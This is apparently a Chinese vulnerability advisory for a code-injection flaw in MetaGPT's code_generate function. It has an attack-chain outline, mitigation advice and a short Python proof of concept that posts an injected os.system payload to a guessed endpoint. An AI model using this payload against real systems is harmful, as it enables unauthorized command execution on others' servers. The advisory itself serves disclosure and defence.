CVE-2026-4515 MetaGPT代码注入漏洞

漏洞信息

漏洞编号

CVE-2026-4515

漏洞类型

代码注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MetaGPT

漏洞概述

Foundation Agents MetaGPT 0.8.1及之前版本存在严重的代码注入漏洞。该漏洞位于metagpt/ext/aflow/scripts/operator.py文件的code_generate函数中，由于缺乏对输入的严格过滤，导致攻击者能够远程注入并执行任意代码。攻击者仅需低权限即可利用此漏洞，且目前已有公开的利用代码，厂商尚未发布修复补丁，潜在风险极高。

技术细节

该漏洞位于MetaGPT项目的`metagpt/ext/aflow/scripts/operator.py`文件内，核心问题在于`code_generate`函数存在不安全的动态代码执行逻辑。该函数在处理用户提供的输入数据时，缺乏有效的安全验证机制，允许攻击者将恶意Python代码注入到执行流中。攻击者可以通过发送特制的HTTP请求至相关端点，利用网络攻击向量（AV:N）远程触发漏洞。由于无需用户交互（UI:N）且仅需低权限（PR:L），攻击者可以轻易利用此漏洞。成功利用后，攻击者可获得应用程序运行权限，执行任意系统命令，进而窃取敏感数据、篡改文件或破坏服务，对机密性、完整性及可用性造成影响。鉴于利用代码已披露，建议立即实施临时缓解措施。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统运行的是Foundation Agents MetaGPT版本0.8.1或更早版本。

STEP 2

2. 构造Payload

攻击者构造包含恶意Python代码的Payload，旨在通过code_generate函数执行系统命令。

STEP 3

3. 发送恶意请求

攻击者使用低权限账户，通过网络向metagpt/ext/aflow/scripts/operator.py接口发送特制的HTTP请求。

STEP 4

4. 代码注入与执行

服务器端未正确过滤输入，导致恶意代码在服务器上下文中被执行，可能获取系统权限。

STEP 5

5. 建立后门/数据窃取

攻击者利用获得的执行权限，进一步安装后门、窃取敏感数据或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL (Example, needs to be adjusted to the actual vulnerable endpoint)
# The vulnerability is in metagpt/ext/aflow/scripts/operator.py -> code_generate
target_url = "http://127.0.0.1:8080/api/code_generate" 

# Malicious payload to inject Python code
# This payload attempts to execute 'whoami' command using os.system
payload = "'; import os; os.system('whoami'); #"

# Data structure usually expected by such APIs (adjust based on actual implementation)
data = {
    "prompt": "Write a function",
    "code": payload  # Injecting into the vulnerable parameter
}

headers = {
    "Content-Type": "application/json"
}

try:
    # Send the malicious request
    response = requests.post(target_url, data=json.dumps(data), headers=headers)
    
    # Check if the attack was successful (based on response or side effects)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print(f"[+] Response: {response.text}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

MetaGPT <= 0.8.1

防御指南

临时缓解措施

由于厂商尚未发布修复补丁，建议暂时禁用受影响的code_generate功能或相关脚本模块。同时，应严格限制对MetaGPT服务的网络访问，仅允许可信IP连接。加强对系统日志的监控，及时检测异常的代码执行行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4515
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4515
3 Details https://www.cvedetails.com/cve/CVE-2026-4515/
4 VulDB https://vuldb.com/cve/CVE-2026-4515
5 Link https://github.com/Ka7arotto/cve/blob/main/metagpt-rce1.md
6 Link https://vuldb.com/?ctiid.352080
7 Link https://vuldb.com/?id.352080
8 Link https://vuldb.com/?submit.773929